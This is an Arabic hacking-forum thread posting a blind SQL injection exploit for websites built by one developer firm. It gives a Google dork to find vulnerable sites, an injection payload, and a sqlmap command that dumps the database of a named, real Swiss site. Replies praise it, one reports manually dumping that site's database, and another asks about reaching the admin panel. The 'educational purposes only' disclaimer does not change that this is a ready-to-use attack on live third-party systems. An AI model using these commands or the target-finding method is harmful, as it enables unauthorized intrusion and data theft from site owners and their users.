مضى على الشبكة و يوم من العطاء.
  • تحذير: يجب على كل روّاد الشبكة تشغيل برامج الاختراق داخل الأنظمة الوهمية وهي بهدف التعلم وحماية الأعضاء والتوعية بها

ثغرة - Blind Sql Injection

ExEExE is verified member.

.:: كبار شخصيات المنتدى ::.
>:: v1p ::<

السمعة:

#Exploit Title: VSFB DEVELOPERS ZONE PVT - Blind Sql Injection

  • ضعه بقوقل أو أي محرك بحث:
كود:
#Google Dork: "Website Developed by VSFB DEVELOPERS ZONE PVT. LTD." قطه بقوقل  او اي محرك بحث

تجربة لبعض المواقع :


  • احقن بعد رقم 2
كود:
%27%20and%20false--+

Screenshot_2023-12-19_11_32_04.png

  • افتح sqlmap حط هذا :
كود:
sqlmap -u https://samaritermuensingen.ch/index.php?id=2  --random-agent  --threads=10 --level=5 --risk=3   --no-cast --time-sec=10 -D samariter_1  --dump

تنبيه: هذا المحتوى للأغراض التعليمية فقط.

بالتوفيق
 
التعديل الأخير بواسطة المشرف:
#Exploit Title: VSFB DEVELOPERS ZONE PVT - Blind Sql Injection

كود:
#Google Dork: "Website Developed by VSFB DEVELOPERS ZONE PVT. LTD." قطه بقوقل  او اي محرك بحث

تجربه لبعض المواقع :

احقن بعد رقم 2
كود:
%27%20and%20false--+

مشاهدة المرفق 6372

افتح sqlmap حط هذا :

كود:
sqlmap -u https://samaritermuensingen.ch/index.php?id=2  --random-agent  --threads=10 --level=5 --risk=3   --no-cast --time-sec=10 -D samariter_1  --dump

بالتوفيق 🌷

تنبيه: هذا المحتوى للأغراض التعليمية فقط.
بارك الله فيك ياعقالي والله يعطيك الف عافيه ❤️
ننتظر جديدك دايماً
تقبل مروري
 
بارك الله فيك شكرا على ما قدمته

تم حقن الموقع بطريقة يدوية بعيدا عل اداة sqlmap
الموقع سهل وتم عمل Dump لقاعدة البيانات
👇Proof Of Concept👇
IMG_20240127_114416.jpg
 
حد وصل لمسار لوحة الادمن
 

آخر المشاركات

فانوس

رمضان
عودة
أعلى